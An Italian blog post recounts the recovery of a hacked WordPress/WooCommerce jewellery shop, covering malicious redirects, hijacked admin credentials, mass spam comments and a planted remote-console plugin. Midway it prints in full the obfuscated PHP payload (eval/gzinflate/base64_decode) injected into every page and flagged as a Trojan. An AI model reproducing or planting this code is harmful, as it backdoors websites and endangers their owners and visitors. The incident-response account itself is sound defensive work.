Poche volte mi è capitato di vedere un sito completamente craccato. In effetti, sono sempre stato una persona abbastanza scrupolosa per quanto riguarda l'aspetto sicurezza.
In questi giorni mi sono occupato del recupero di un piccolo e-commerce di articoli di gioielleria che aveva subito un craking abbastanza importante.
Scenario
In sostanza si tratta di un semplice script in php con una funzione base64_decode. L'utilizzo di tale codifica sembra sia stato utilizzato per fare un GET sulla pagina. (Ho provato a decriptarlo con qualche tool ma vengono visualizzati una serie di stringhe alfanumeriche).
L'unica strada che mi si presentava davanti era quelli di eliminare tutti i file e ricaricarli ma dovevo anche aggiornare Wordpress.
Prima di eseguire l'aggiornamento mi sono premurato ti cancellare i quasi 274 mila commenti di spam. Sulla questione dei commenti ho notato una cosa interessante: in pratica tutte le opzioni di commento erano libere, chiunque poteva commentare anche senza essere registrato e senza neanche inserire un nome utente ed e-mail. Da qui si deduce che il nostro cracker si sia anche premurato di entrare come administrator e smanettare nel pannello di controllo.
Aggiornato Wordpress ho successivamente modificato le password di administrator e ftp ed eliminato l'utente admin rinominando in un nome strano.
Aspetti interessanti
In questi giorni mi sono occupato del recupero di un piccolo e-commerce di articoli di gioielleria che aveva subito un craking abbastanza importante.
Scenario
- La Home veniva reindirizzata a diversi siti esteri
- Tutte le pagine presentavano del cordice malevolo
- La password di admin era stata modificata così come la email
- Tutti i prodotti presentavano 40/50 commenti spam
- Wordpress non era aggiornato da un bel pò di tempo
- Stesso discorso per Woocommerce
La prima cosa che mi è venuta in mente di fare è quella di togliere il redirect dalla home page, anche perchè le pagine prodotto invece funzionavano benissimo.
Il redirect si trovava a livello .htaccess e nell'header di Wordpress. Nel momento in cui mi sono trovato a scaricare la pagina l'antivirus mi ha avvisato della presenza di un Trojan.
In un primo momento mi ero ricreduto che il cracker si fosse limitato a un Redirect 301. Mi sbagliavo !
Tutte le pagine presentavano un "injection" di un codice malevolo nella testata della pagina:
<?php eval(gzinflate(base64_decode('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')));?>
In sostanza si tratta di un semplice script in php con una funzione base64_decode. L'utilizzo di tale codifica sembra sia stato utilizzato per fare un GET sulla pagina. (Ho provato a decriptarlo con qualche tool ma vengono visualizzati una serie di stringhe alfanumeriche).
L'unica strada che mi si presentava davanti era quelli di eliminare tutti i file e ricaricarli ma dovevo anche aggiornare Wordpress.
Prima di eseguire l'aggiornamento mi sono premurato ti cancellare i quasi 274 mila commenti di spam. Sulla questione dei commenti ho notato una cosa interessante: in pratica tutte le opzioni di commento erano libere, chiunque poteva commentare anche senza essere registrato e senza neanche inserire un nome utente ed e-mail. Da qui si deduce che il nostro cracker si sia anche premurato di entrare come administrator e smanettare nel pannello di controllo.
Aggiornato Wordpress ho successivamente modificato le password di administrator e ftp ed eliminato l'utente admin rinominando in un nome strano.
Aspetti interessanti
- Ho trovato installato un plugin UBH CSU il quale permette di eseguire una console da remoto. Agghiacciante è dir poco. Facendo un paio di ricerche mi sono imbattuto nel forum Wordpress ed ho letto che è tool abbastanza utilizzato dai cracker.
- La password e l'email dell'account admin erano state modificate. Riguardo l'email l'obiettivo era quello di non avvisare l'administrator ufficiale di nuovi commenti (?)
Altri passaggi successivi
- Controllo del sito con https://sitecheck.sucuri.net
- Report sicurezza su http://www.unmaskparasites.com/security-report/
Risorse
Nessun commento:
Posta un commento